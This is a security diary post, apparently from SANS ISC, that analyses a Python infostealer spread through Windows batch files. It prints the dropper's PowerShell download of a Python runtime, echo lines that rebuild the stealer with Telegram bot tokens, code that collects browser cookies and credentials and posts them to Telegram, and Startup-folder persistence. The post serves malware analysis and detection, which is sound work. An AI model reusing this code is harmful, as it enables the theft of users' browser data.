Short Summary:
This article discusses the increasing use of Python in malicious activities within the Windows ecosystem. It highlights how attackers exploit Python’s ease of deployment, lack of integration with AMSI, and its ability to interact with various system layers to create and execute malicious scripts. The article provides examples of how Python scripts can be delivered and executed on victim machines, emphasizing the need for vigilance against suspicious Python processes.
Key Points:
- Python is frequently used in malicious scripts within the Windows ecosystem.
- The language’s non-default installation on Windows allows easy deployment by attackers.
- Python’s lack of AMSI integration makes it easier for attackers to debug and execute scripts without detection.
- Malicious Python scripts can be delivered via batch files that reconstruct the script on the victim’s machine.
- Exfiltrated data can be sent to Telegram bots, showcasing a simple load-balancing solution for data theft.
- Persistence mechanisms are often implemented through the Startup menu to ensure continued execution of malicious scripts.
- Monitoring Python processes on Windows hosts is crucial for identifying potential threats.
MITRE ATT&CK TTPs – created by AI
- Command-Line Interface (T1059.003)
- Attackers use command-line interfaces to execute malicious scripts and commands.
- Exfiltration Over Command and Control Channel (T1041)
- Data is exfiltrated through established communication channels, such as Telegram bots.
- Persistence (T1547)
- Malicious scripts are set to run at startup to maintain persistence on the victim’s machine.
- Data from Information Repositories (T1213)
- Attackers gather sensitive information from various data sources, such as browser data.
It has been a while since I started to track how Python is used in the Windows eco-system[1]. Almost every day I find new pieces of malicious Python scripts. The programming language itself is not malicious. There are plenty of reasons to use Python on Windows. Think about all Didier’s tools[2], Most of them are written in Python!
Why did Python become so popular for attackers? I think that the main reason is that the language is not installed by default on Windows and it can be deployed easily by unpacking some files in any directory without requiring administrator rights:
@echo off C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://github[.]com/h4x0rpeter/CookieStealer/raw/main/python.zip -OutFile C:UsersPublicDocument.zip; C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden expand-Archive C:UsersPublicDocument.zip -DestinationPath C:UsersPublicDocument;
Python can be expanded using libraries and, if added to the ZIP archive, the attacker will expand default Python capabilities.
Another fact is that Python is not integrated like other scripting languages (JS, VBS, PowerShell) into the AMSI[3] framework. You can easily debug scripts through AMSI:
PS1:> logman start AMSITrace -p Microsoft-Antimalware- Scan-Interface Event1 -o AMSITrace.etl -ets
This command will start recording all activities generated by scripts… except for Python!
Another fact why Python is very popular: it can interact with all layers of the operating system (filesystem, registry, processes, network, …) but can also call any API from any DLL! I mentioned this in my yesterday’s diary[4].
Once Python has been deployed on the victim’s computer, the malicious script must be delivered. If often the script is downloaded from an online resource, sometimes it can be extracted or … reconstructed! Today, I found a batch file that will generate the malicious script by echoing all the lines in a file on disk:
echo import os,json,shutil,win32crypt,hmac,platform,sqlite3,base64,random,requests,subprocess>>C:UsersPublicstub.py echo from datetime import datetime,timedelta>>C:UsersPublicstub.py echo from Crypto.Cipher import DES3>>C:UsersPublicstub.py echo from Crypto.Cipher import AES>>C:UsersPublicstub.py echo from pyasn1.codec.der import decoder>>C:UsersPublicstub.py echo from hashlib import sha1, pbkdf2_hmac>>C:UsersPublicstub.py echo from Crypto.Util.Padding import unpad >>C:UsersPublicstub.py echo from base64 import b64decode>>C:UsersPublicstub.py echo idbot = "backup">>C:UsersPublicstub.py echo apibot1='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:UsersPublicstub.py echo id1='-4288554353'>>C:UsersPublicstub.py echo apibot2='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:UsersPublicstub.py echo id2='4288554353'>>C:UsersPublicstub.py echo hostname = os.getenv("COMPUTERNAME")>>C:UsersPublicstub.py echo usernamex = os.getlogin()>>C:UsersPublicstub.py echo windows_version = platform.platform()>>C:UsersPublicstub.py echo now = datetime.now()>>C:UsersPublicstub.py echo response =requests.get("https://ipinfo.io").text>>C:UsersPublicstub.py echo ip_country = json.loads(response)>>C:UsersPublicstub.py echo name_country = ip_country['region']>>C:UsersPublicstub.py
The purpose of the script is simple: It’s another infostealer that will exfiltrate collected information via Telegram:
def main(): numbers=intNumbers() number = "Status number send: " + str(numbers) u2 = 'hxxps://api[.]telegram[.]org/bot'+apibot2+'/sendDocument' u1 = 'hxxps://api[.]telegram[.]org/bot'+apibot1+'/sendDocument' browsers = { 'chrome': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data"), 'Edge': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data"), 'Opera': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable"), 'Brave': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "BraveSoftware", "Brave-Browser", "User Data"), 'firefox': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Mozilla", "Firefox", "Profiles"), 'chromium': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Chromium", "User Data") } data_path = os.path.join(os.environ["TEMP"], name_f) os.mkdir(data_path) data_path_ck = os.path.join(os.environ["TEMP"], name_f, "filecookie") os.mkdir(data_path_ck) for browser_name, browser_path in browsers.items(): get_browser_data(data_path, browser_path, browser_name) zip_file_path = os.path.join(os.environ["TEMP"], name_f + '.zip') shutil.make_archive(zip_file_path[:-4], 'zip', data_path) if numbers == 1: with open(zip_file_path, 'rb') as f: requests.post(u1,data={'caption': "n"+"Country : "+name_country + "-" + timezone + "n"+ windows_version +"rnIPAdress:"+ip + "rn"+ number,'chat_id': id1},files={'document': f}) else : with open(zip_file_path, 'rb') as f: requests.post(u2,data={'caption': "n"+"Country : "+ name_country + "-" + timezone +"n"+ windows_version +"rnIPAddress:"+ip + "rn"+ number,'chat_id': id2},files={'document': f}) shutil.rmtree(data_path, ignore_errors=True) try: os.remove(zip_file_path) except Exception as e: print("Error")
Funny, exfiltrated data will be sent to two different Telegram bots depending on the value of $numbers. It’s a simple load-balancing solution:
def intNumbers(): path_demso = r"C:UsersPublicnumber.txt" if os.path.exists(path_demso): with open(path_demso, 'r') as file: number = file.read() number = int(number)+1 with open(path_demso, 'w') as file: abc = str(number) file.write(abc) else: with open(path_demso, 'w') as file: file.write("1") number = ^1 return number
Finally, persistence will be added via the Startup menu:
for /f %%i in ('echo %USERNAME%') do set user=%%i echo cmd /c C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden C:UsersPublicDocumentpython.exe C:UsersPublicstub.py;>>C:UsersPublicWindows.bat C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden -command "Get-Content 'C:UsersPublicWindows.bat' | Set-Content 'C:Users!user!AppDataRoamingMicrosoftWindowsStart MenuProgramsStartupWindows.bat'"
The batch file has again a low VT score (4/65)[5].
Conclusion: Keep an eye on Python processes on your Windows hosts! If you don’t need Python for your daily tasks, any process should be considered suspicious!
[1] https://www.sans.org/webcasts/who-said-that-python-was-unix-best-friend-only/
[2] https://blog.didierstevens.com/my-software/
[3] https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
[4] https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204
[5] https://www.virustotal.com/gui/file/e721ae2bfd0f3bc4da3b60090aa734cd31878134ed3fdfa49abc4b26b825da47/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
Source: https://isc.sans.edu/diary/rss/31208